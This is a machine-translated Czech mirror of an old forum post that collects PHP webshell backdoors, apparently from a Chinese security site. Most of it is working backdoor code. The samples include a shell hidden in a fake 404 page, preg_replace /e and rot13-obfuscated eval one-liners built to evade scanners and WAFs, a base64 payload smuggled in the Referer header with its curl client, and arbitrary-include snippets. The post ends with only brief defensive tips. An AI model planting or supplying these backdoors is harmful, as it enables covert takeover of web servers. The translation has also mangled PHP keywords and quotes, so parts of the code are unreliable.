Tento článek je zrcadlovým článkem o strojovém překladu, klikněte zde pro přechod na původní článek.

Pohled: 7260|Odpověď: 0

[Bezpečná komunikace] Vyřešit ty silné PHP zadní vrátka

[Kopírovat odkaz]
Zveřejněno 01.12.2014 21:41:13 | | |
K těmto PHP backdoor programům přistupujeme s učením a hodně PHP backdoor kódu nám umožňuje vidět, jak dobře mínění programátoři mají.
Silné PHP zadní vrátka v jedné větě
Tento druh zadních vrátek umožňuje webové stránky,Správci serverů jsou velmi obtížní a často musí měnit metody pro provádění různých detekcí, a mnoho nových technik psaní nelze objevit a řešit běžnými metodami detekce.
Dnes si představíme několik zajímavých PHP trojanů.
1. Skrýt PHP poníky pomocí 404 stránek:
[mw_shl_code=php,true] <!DOCTYPE HTML VEŘEJNÉ "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Nenalezeno</title>
</head><body>
<h1>Nenalezeno</h1>
<p>Požadovaná URL adresa na tomto serveru nebyla nalezena.</p>
</body></html>
<?php
@preg_replace("/[pageerror]/e",$_POST['error'],"saft");
hlavičku('HTTP/1.1 404 Not Found');
?>[/mw_shl_code]
Stránka 404 je běžně používaný soubor na webu a jen málo lidí ho bude kontrolovat a upravovat poté, co je obecně doporučen, takže ho můžeme použít k zakrytí zadních vrátek.

2. Bezvýrazné skryté PHP v jedné větě:
[mw_shl_code=php,true]<?php
session_start();
$_POST['code'] & $_SESSION['theCode'] = trim($_POST['code']);
$_SESSION['theCode']&preg_replace ('\'a\'eis','e'.' v’.‘ a’.‘ l’.‘ (base64_decode($_SESSION[\'theCode\']))','a');
?>[/mw_shl_code]
Přiřaďte $_POST['code'] k $_SESSION['theCode'] a poté spusněte $_SESSION['theCode'], přičemž zvýraznění je, že neexistuje podpisový kód.
Pokud použijete skenovací nástroj ke kontrole kódu, nealarmuje a nedosáhne cíle.

3. Super nenápadné PHP zadní vrátka:
[mw_shl_code=php,true]<?php $_GET[a]($_GET);?>
[/mw_shl_code]
Funkce GET sama o sobě tvoří trojského stroje;
Jak používat:
[mw_shl_code=php,true]        
?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28P[/mw_shl_code]
Po vykonání aktuální adresář vygeneruje trojan c.php věty, když je parametr A evalován, generování chybového trojana selhalo, a když je vyhlášeno, také nahlásí chybu, ale vygeneruje trojského koně, kterého nelze podcenit.
Požadavek na úroveň, kód pro spuštění PHP backdoor:
Tato metoda je implementována se dvěma soubory, souborem 1
[mw_shl_code=php,true]<?php
//1.php
hlavičku('Content-type:text/html; Charset=utf-8′);
parse_str($_SERVER['HTTP_REFERER'], $a);
if(reset($a) == '10'& count($a) == 9) {
eval(base64_decode(str_replace(" ", "+", implode(array_slice($a, 6)))));
}
?>[/mw_shl_code]
Dokument 2
[mw_shl_code=php,true]<?php
//2.php
hlavičku('Content-type:text/html; Charset=utf-8′);
//要执行的代码
$code= <<<KÓD
phpinfo();
CODE;
//进行base64编码
$code= base64_encode($code);
//构造referer字符串
$referer= "a=10&b=ab&c=34&d=re&e=32&f=km&g={$code}&h=&i=";
//后门url
$url= 'http://localhost/test1/1.php';
$ch= curl_init();
$options= pole(
CURLOPT_URL => $url,
CURLOPT_HEADER => NEPRAVDA,
CURLOPT_RETURNTRANSFER => PRAVDA,
CURLOPT_REFERER => $referer
);
curl_setopt_array($ch, $options);
echocurl_exec($ch);
?>[/mw_shl_code]
Spusť kód kódovaný base64 přes HTTP_REFERER v HTTP požadavku, aby se dosáhlo efektu zadních vrátek.
Je dobré využít tento nápad k obejití WAF.
4.PHP nástroj generátoru zadních vrátek
weevely je specifický pro PHPWebshell free software lze použít k simulaci connection shellu podobného telnetu, Weevely se obvykle používá pro zneužívání webových programů, skrývání zadních vrátek nebo použití telnetových metod místo správy webových stránek, serverový PHP kód generovaný Weevely je kódován v base64, takže může klamat hlavní antivirový software a IDS, Jakmile nahrajete serverový kód, obvykle ho můžete spustit přímo přes Weevely.
Funkce používané v backdooru jsou běžně používané funkce pro zpracování řetězců a funkce jako eval a system, které slouží jako inspekční pravidla, se v kódu neobjeví, takže backdoor soubor může obejít kontrolu backdoor search nástroje. Skenování pomocí nástroje pro detekci zadních vrátek na webu temné skupiny ukazuje, že soubor není ohrožen.
Výše uvedené je obecný úvod a příslušné způsoby používání zde nejsou představeny, jde o jednoduchou popularizaci vědy.
4. Tři deformované jednovětné PHP trojany
      První:
[mw_shl_code=php,true]<?php ($_=@$_GET[2]).@$_($_POST[1])?>
[/mw_shl_code]
Druhá
[mw_shl_code=php,true]<?php
$_=“”;
$_[+“”]=”;
$_=“$_”.“”;
$_=($_[+“”]|“ ”). ($_[+“”]|“”). ($_[+“”]^“”);
?>
<?php ${'_'.$_}['_'](${'_'.$_}['__']);?>[/mw_shl_code]
Napište http://site/2.php?_=assert&__=eval($_POST['pass']) heslo do kuchyňského nože: heslo je pass.
Pokud použijete dodatečná data kuchyňského nože, jsou více skrytá, nebo můžete použít jiné nástroje pro injekci, protože je to odesláno po odeslání.
Třetí
[mw_shl_code=php,true] ($b 4dboy= $_POST['b4dboy']) & @preg_replace('/ad/e','@'.str_rot13('riny').' ($b 4dboy)', 'přidat'); [/mw_shl_code]
str_rot13 ("riny") je kódované hodnocení, které zcela vyhýbá klíčovým slovům, aniž by ztratilo efekt, což způsobuje, že lidé zvracejí krev!
5. Nakonec uveďte několik pokročilých PHP trojských vrátek:
1、
[mw_shl_code=php,true]$hh= "p"." r”.“ e”.“ g”.“ _”.“ r”.“ e”.“ p”.“ l”.“ a”.“ c”.“ e”;
$hh("/[discuz]/e",$_POST['h'],"Access"); [/mw_shl_code]
//菜刀一句话
2、
[mw_shl_code=php,true]$filename=$_GET['xbid'];
include($filename); [/mw_shl_code]
//危险的include函数,直接编译任何文件为php格式运行
3、
[mw_shl_code=php,true]$reg="c"." o”.“ p”.“ y”;
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);
[/mw_shl_code]
//重命名任何文件
4、
[mw_shl_code=php,true]$gzid= "p"." r”.“ e”.“ g”.“ _”.“ r”.“ e”.“ p”.“ l”.“ a”.“ c”.“ e”;
$gzid("/[discuz]/e",$_POST['h'],"Access"); [/mw_shl_code]
//菜刀一句话
5、
[mw_shl_code=php,true]include($uid); [/mw_shl_code]
//危险的include函数,直接编译任何文件为php格式运行,POST
[mw_shl_code=php,true]www.xxx.com/index.php?uid=/home/www/bbs/image.gif [/mw_shl_code]
//gif插一句话
Shrnuto, tyto PHP zadní vrátka lze popsat jako kompletní, pokud nebudete opatrní, určitě budete oklamáni, a co je dnes hlavní prioritou našeho článku? Klíčové body najdete v následujícím shrnutí!
Jak se vypořádat s PHP jednovětným zadním vrátkem:
Zdůrazňujeme několik klíčových bodů a pokud si přečtete tento článek, myslím, že nejste laik, takže nebudu rozvláčný:
  • Buďte si vědomi bezpečnosti při psaní PHP programů
  • Serverové logy by měly být často čteny a zálohovány
  • Přísné přiřazení povolení pro každé místo
  • Časté dávkové bezpečnostní kontroly dynamických souborů a adresářů
  • Naučte se, jak provádět manuální antivirovou "Behavioral Judgment Investigation and Killing"
  • Zůstaňte naladěni, nebo se infiltrujte do aktivního kybernetického tábora
  • Dokonce i funkce může být použita jako pravidlo pro hierarchické zpracování serverového prostředí
Věříme, že když je více webů k řízení a velké množství dat, měli bychom rozumně použít některé pomocné nástroje, ale neměli bychom se na ně zcela spoléhat, technologie se neustále aktualizuje a zlepšuje, nejdůležitější je, abyste se naučili a pochopili myšlení těchto silných zadních vrátek a přenášení role vám může přinést větší pokrok.





Předchozí:Firefox pluginy Firefox Hacking Plugin proměňuje Firefox v hackerský nástroj se sedmi pluginy
Další:MS12-020 3389 0day exp Remote Desktop Execution Code python zdrojový kód
Zřeknutí se:
Veškerý software, programovací materiály nebo články publikované organizací Code Farmer Network slouží pouze k učení a výzkumu; Výše uvedený obsah nesmí být používán pro komerční ani nelegální účely, jinak nesou všechny důsledky uživatelé. Informace na tomto webu pocházejí z internetu a spory o autorská práva s tímto webem nesouvisí. Musíte výše uvedený obsah ze svého počítače zcela smazat do 24 hodin od stažení. Pokud se vám program líbí, podporujte prosím originální software, kupte si registraci a získejte lepší skutečné služby. Pokud dojde k jakémukoli porušení, kontaktujte nás prosím e-mailem.

Mail To:help@itsvse.com